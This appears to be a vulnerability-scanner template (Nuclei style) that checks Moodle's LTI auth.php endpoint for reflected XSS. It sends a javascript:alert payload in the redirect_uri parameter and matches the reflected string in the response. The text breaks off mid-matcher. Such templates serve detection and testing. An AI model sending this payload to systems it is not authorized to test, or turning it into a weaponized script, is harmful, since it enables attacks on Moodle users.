id: moodle-xss info: name: Moodle redirect_uri Reflected XSS author: hackergautam description: XSS in moodle via redirect_uri parameter severity: medium tags: moodle,xss reference: https://twitter.com/JacksonHHax/status/1391367064154042377 requests: - method: GET path: - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')" matchers-condition: and matchers: - type: word part: body words: - '{{randstr}}' - '